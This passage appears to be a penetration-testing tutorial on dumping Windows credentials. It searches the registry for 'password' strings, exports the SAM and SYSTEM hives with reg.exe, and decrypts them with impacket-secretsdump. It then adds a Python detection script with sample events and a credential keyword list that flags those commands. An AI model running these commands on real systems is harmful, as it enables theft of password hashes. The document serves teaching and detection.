Registry Hives

We can utilize the Windows registry to harvest information. The following command examples can be used to query the registry for the password keyword:

reg query HKLM /f <search_pattern> /t REG_SZ /s
reg query HKCU /f <search_pattern> /t REG_SZ /s
reg query HKU /f <search_pattern> /t REG_SZ /s

a. HKLM, HKCU, HKU: These values refer to the required keyname argument, the root key under which the search is performed

  • HKLM: HKEY_LOCAL_MACHINE key which contains configuration information particular to the computer (for any user)

  • HKCU: HKEY_CURRENT_USER key which contains the root of the configuration information for the user who is currently logged on. The user's folders, screen colors, and Control Panel settings are stored here. This information is associated with the user's profile.

  • HKU: HKEY_USERS key which contains all the actively loaded user profiles on the computer

Since we did not specify a remote machine (\\<computername>\), the operation defaults to the local computer.

b. /f : Specifies the data or pattern to search for

c. /t : Specifies registry types to search. Valid types are: REG_SZ, REG_MULTI_SZ, etc.

  • In this case, we specify REG_SZ, which is a plain text string value

d. /s : Specifies to query all subkeys and value names recursively

Example

The Windows registry may store a copy of some of the SAM database contents to be used by Windows services. We can use the reg.exe tool to save registry hives to files. The following commands extract the two hives required to decrypt the SAM database's content, namely HKLM\SAM and HKLM\SYSTEM:

Administrator shell
C:\> reg.exe save HKLM\SAM C:\users\Administrator\Desktop\sam-reg
C:\> reg.exe save HKLM\system C:\users\Administrator\Desktop\system-reg

We can now use the Impacket secretsdump.py script to decrypt the SAM database content:

Attacker machine
$ impacket-secretsdump -sam <SAM_file_location> -system <system_file_location> LOCAL

  • -sam : SAM hive to parse

  • -system : SYSTEM hive to parse

  • LOCAL : To parse local files
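Both activities on this page, the recursive reg query /f password sweep and the reg.exe save of the HKLM\SAM and HKLM\SYSTEM hives, are command lines that show up in process-creation telemetry (Sysmon Event ID 1, or Security Event ID 4688 when command-line auditing is enabled). The following Python script is an added detection example from the defender's side, not code from the original page: it tokenizes cmd.exe-style command lines and flags the two patterns. The log format, user names, paths and events are constructed for the example and are not real telemetry.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records (one per line, "user|image|command_line"),
# modelled loosely on Sysmon Event ID 1 / Security 4688 fields. Not real telemetry.
SAMPLE_EVENTS = r"""
CORP\alice|C:\Windows\System32\reg.exe|reg.exe save HKLM\SAM C:\users\Administrator\Desktop\sam-reg
CORP\alice|C:\Windows\System32\reg.exe|reg.exe save HKLM\system C:\users\Administrator\Desktop\system-reg
CORP\bob|C:\Windows\System32\reg.exe|reg query HKLM /f password /t REG_SZ /s
CORP\svc_backup|C:\Windows\System32\reg.exe|reg.exe save "HKLM\SOFTWARE\Contoso" C:\backup\contoso.hiv
CORP\carol|C:\Windows\System32\reg.exe|reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
CORP\dave|C:\Windows\System32\cmd.exe|cmd.exe /c echo password
"""

# Hive export targets worth alerting on: the SAM hive (root or any subkey) and the
# SYSTEM hive root, which together are what the page shows being saved to disk.
SENSITIVE_HIVE_RE = re.compile(
    r"^(?:HKLM|HKEY_LOCAL_MACHINE)\\(?:SAM(?:\\|$)|SYSTEM$)", re.IGNORECASE
)

# Substrings in a /f search pattern that indicate a credential hunt in the registry.
CREDENTIAL_KEYWORDS = ("password", "passwd", "pwd")


@dataclass
class Finding:
    user: str
    rule: str
    command_line: str


def tokenize(command_line):
    """Split a cmd.exe-style command line, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def is_reg_exe(image, tokens):
    """True when the process image or argv[0] is reg.exe, regardless of directory."""
    image_name = image.rsplit("\\", 1)[-1].lower()
    argv0 = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    return image_name == "reg.exe" or argv0 in ("reg", "reg.exe")


def classify(image, command_line):
    """Return a rule name for a suspicious reg.exe invocation, or None if benign."""
    tokens = tokenize(command_line)
    if not is_reg_exe(image, tokens) or len(tokens) < 2:
        return None
    verb, args = tokens[1].lower(), tokens[2:]

    # Rule 1: "reg save" whose target is the SAM or SYSTEM hive.
    if verb == "save" and args:
        target = args[0].rstrip("\\")
        if SENSITIVE_HIVE_RE.match(target):
            return "sensitive-hive-export"

    # Rule 2: "reg query ... /f <pattern>" where the pattern looks for credentials.
    if verb == "query":
        lowered = [a.lower() for a in args]
        if "/f" in lowered:
            idx = lowered.index("/f")
            if idx + 1 < len(lowered) and any(k in lowered[idx + 1] for k in CREDENTIAL_KEYWORDS):
                return "credential-keyword-search"
    return None


def scan(events_text):
    """Run both rules over pipe-separated event lines and collect findings."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        user, image, command_line = line.split("|", 2)
        rule = classify(image, command_line)
        if rule:
            findings.append(Finding(user, rule, command_line))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.user}: {f.command_line}")
```

The backup account exporting HKLM\SOFTWARE\Contoso and the plain query of the Run key are deliberately left unflagged, so the rules key on the hive and the search pattern rather than on reg.exe itself; tuning for your environment mostly means deciding which SYSTEM subkeys legitimate administration exports and whether the keyword list should be broadened.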
